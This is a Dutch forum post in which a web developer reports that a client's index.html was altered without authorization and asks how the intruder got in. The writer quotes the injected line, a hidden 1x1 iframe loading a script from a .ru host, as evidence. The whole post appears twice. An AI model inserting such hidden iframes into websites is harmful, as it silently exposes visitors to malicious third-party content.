Hallo,
Van een klant waarvoor ik een site gebouwd heb ontving een mailtje dat er ineens ongewenst venster geopend wordt bij het bezoeken van de site. Tot mijn grote verbazing bleek inderdaad de broncode gewijzigd te zijn: mijn originele index.html van 5 juli 2006 blijkt op 19 februari van dit jaar door wie dan ook veranderd te zijn (ik was het in ieder geval niet). Onderin bleek het volgende toegevoegd te zijn:
<iframe width=1 height=1 border=0 frameborder=0 src="http://www.pharmgame.ru/counter/client.php"></iframe>
Niet erg kwaadaardig maar toch zeeeeer ongewenst :evil:
Mijn webspaceprovider meent dat de fout bij mij moet liggen en dat ik m'n PC maar beter moet beschermen. Ze suggereren dat een hacker zich via mijn (met Sygate Personal Firewall Pro en NOD32 beschermde) PC de toegang heeft verschaft. Deze hacker weet
blijkbaar dat ik de beheerder ben van deze site, heeft ergens mijn inlognaam en wachtwoord hiervoor opgespoord en tot slot de index.html veranderd en geupload.
Ik vind dit erg ongeloofwaardig, en op zijn minst bijzonder omslachtig. De andere sites
die ik onder beheer heb zijn niet gewijzigd.
Is het niet veel waarschijnlijker dat een hacker direct toegang had tot de server waar index.html op draait om het bestand daar te veranderen? En als Het Lek toch bij mij ligt, wat kan ik dan doen? Want dit mag niet nogmaals gebeuren.
Groeten en dank,
0dd0w.
Van een klant waarvoor ik een site gebouwd heb ontving een mailtje dat er ineens ongewenst venster geopend wordt bij het bezoeken van de site. Tot mijn grote verbazing bleek inderdaad de broncode gewijzigd te zijn: mijn originele index.html van 5 juli 2006 blijkt op 19 februari van dit jaar door wie dan ook veranderd te zijn (ik was het in ieder geval niet). Onderin bleek het volgende toegevoegd te zijn:
<iframe width=1 height=1 border=0 frameborder=0 src="http://www.pharmgame.ru/counter/client.php"></iframe>
Niet erg kwaadaardig maar toch zeeeeer ongewenst :evil:
Mijn webspaceprovider meent dat de fout bij mij moet liggen en dat ik m'n PC maar beter moet beschermen. Ze suggereren dat een hacker zich via mijn (met Sygate Personal Firewall Pro en NOD32 beschermde) PC de toegang heeft verschaft. Deze hacker weet
blijkbaar dat ik de beheerder ben van deze site, heeft ergens mijn inlognaam en wachtwoord hiervoor opgespoord en tot slot de index.html veranderd en geupload.
Ik vind dit erg ongeloofwaardig, en op zijn minst bijzonder omslachtig. De andere sites
die ik onder beheer heb zijn niet gewijzigd.
Is het niet veel waarschijnlijker dat een hacker direct toegang had tot de server waar index.html op draait om het bestand daar te veranderen? En als Het Lek toch bij mij ligt, wat kan ik dan doen? Want dit mag niet nogmaals gebeuren.
Groeten en dank,
0dd0w.
